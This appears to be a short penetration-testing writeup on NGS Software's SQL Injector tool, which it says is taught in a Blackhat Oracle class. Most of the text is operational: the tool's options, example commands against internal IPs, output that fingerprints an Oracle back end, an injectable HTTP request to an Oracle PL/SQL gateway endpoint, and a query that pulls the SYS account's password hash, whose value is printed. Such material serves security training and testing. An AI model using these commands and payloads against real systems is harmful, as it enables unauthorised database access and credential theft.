SQL Injector

I became aware of this tool after attending the Blackhat Breaking into Oracle Server class given by David Litchfield of NGS Software.  You could essentially equate this tool to similar data mining tools that exploit vulnerabilities in SQL injection on disparate database servers to gain access to stored data.  It currently supports the following databases:

• access

• db2

• informix

• mssql

• mysql

• oracle

• sysbase

At the time of writing this tool has not been publicly released and is only available to those who attend NGS Software specific training courses.

Execution:

C:\>sqlinjector [options]

[Options]
-t      TARGET is the target web server.
-a     ACTION is the action to take:

                       -a database -> workout the database server software
                       -a where -> drill for data by injecting into where clause
-f      FILE is the name of the file that contains the web request.
-p     PORT is the TCP the web server is listening on.
-k     KNOWN is a value that is known to return data.
-gc   GOOD_CODE is the web server response code when everything is OK - usually 200.

-gt    GOOD_TEXT is text you'd expect to see in a good response.
-ec   ERROR_CODE is the web server response code when an error occurs - usually 500.
-et    ERROR_TEXT is the text you'd expect to see in an error response.
-h     help
-qf    QUERY_FILE is the file that contains the single row, single column query -
         e.g. select @@version

Note: - If no query_file is specified the default query is used which extracts the software version for the given server.
-s     SERVER can be one of
        mssql
        oracle
        informix
        mysql
        sysbase
        db2
        access.
-to    TIME_OUT is the TCP timeout (milliseconds) on the connection.
-d     details

Base Examples:

sqlinjector -t 192.168.0.1 -a database -f query.txt -p 80 -gc 200 -ec 500 -k NGS SOFTWARE -gt SQUIRREL
 

Expected Output:

C:\sqlinjector.exe -t 192.168.0.17 -a database -f plsql.txt -p 7777 -gc 200 -ec 404

Probing for database server software...

Doing Microsoft SQL Server test...socket error on receive.
Completed but failed!

Doing Oracle test...Completed and PASSED!

Doing IBM Informix test...socket error on receive.
Completed but failed!

Doing MySQL test...socket error on receive.
Completed but failed!

Doing Microsoft Access test...socket error on receive.
Completed but failed!

Success.

This test essentially fingerprinted that we are dealing with an Oracle back-end server and from here we can then specify particular SQL arguments that may provide more useful output:

C:\sqlinjector.exe -t 192.168.0.17 -p 7777 -a where -gc 200 -ec 404 -qf q.txt -f plsql.txt -s oracle

Doing query on where clause

BB3F4EAC7D09DBBC BB3F4EAC7D09DBBC

Note:-

plsql.txt contains the syntax:

GET /pls/orasso/web.get_object_owner?p_object=#!# HTTP/1.1
Host: 127.0.0.1
 

q.txt contains the syntax:

select password from dba_users where username= 'SYS'